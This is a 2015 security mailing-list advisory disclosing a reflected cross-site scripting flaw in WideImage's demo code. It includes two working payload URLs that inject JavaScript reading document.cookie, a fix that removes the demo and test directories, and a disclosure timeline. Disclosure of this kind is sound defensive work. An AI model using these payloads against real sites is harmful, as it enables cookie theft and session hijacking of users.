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Message-id: <3ae78727-7c2c-4065-abd6-2076d5ad3f30@me.com>
Date: Mon, 06 Jul 2015 11:19:18 +0000 (GMT)
From: 47 <a_47@...oud.com>
To: bugtraq@...urityfocus.com
Cc: submit@...ec.org, fulldisclosure@...lists.org
Subject: [FD] WideImage Demo Code Cross Site Scripting (XSS)
WideImage Demo Code Cross Site Scripting (XSS)
Description:
WideImage is an object-oriented library for image manipulation.
It requires PHP 5.2+ with GD2 extension. The library provides a simple way to loading, manipulating and saving images in the most common image formats.
Type of vulnerability:
Reflected XSS
Threat level:
Medium
Tested on:
Windows 8.1
Product:
WideImage - An Open Source PHP library for image manipulation.
Version:
11.02.19
Build date:
2011-02-19
Live vulnerable URL during discovery:
http://wideimage.sourceforge.net/wp-content/current/demo/index.php
How to replicate this vulnerability:
Assuming WideImage is installed on http://localhost:8080/wideimage/, one can inject
JavaScript with:
Payload URL 1:
http://localhost:8080/wideimage/demo/?colors=255&demo=applyConvolution&dither=1&dither_cb=1&div=1&match_palette=1&match_palette_cb=1&matrix=2%25200%25200%252c%25200%2520-1%25200%252c%25200%25200%2520-1%22%20onmouseover%3dalert%28document.cookie%29%20bad%3d%22&offset=220&output=preset%20for%20demo
Payload URL 1:
http://localhost:8080/wideimage/demo/?colors=255&demo=applyConvolution&dither=1&dither_cb=1&div=1&match_palette=1&match_palette_cb=1&matrix=2%25200%25200%252c%25200%2520-1%25200%252c%25200%25200%2520-1%22%20onmouseover%3dprompt%666%29%20bad%3d%22&offset=220&output=preset%20for%20demo
Workaround/Fix:
To fix this, please remove the two following directories:
public_html/wideimage/demo
public_html/wideimage/test
Disclosure Time-line:
Notified vendor: July 04, 2015
Response from vendor: No response.
Disclosure due to: Page here at http://wideimage.sourceforge.net/support/ says, "6. If it's bug. Report it."
Fix: Not fixed at this time (July 07, 2015)
WideImage Vendor Bug Ticket Reference: http://sourceforge.net/p/wideimage/bugs/42/
Credits and Copyright:
This vulnerability was discovered by Mohammad Sikkandar Sha.
It's licensed under the creative commons attribution license 4.0.
Mohammad Sikkandar Sha, 2015-July-07, Email: sikkandar.lynx@...il.com
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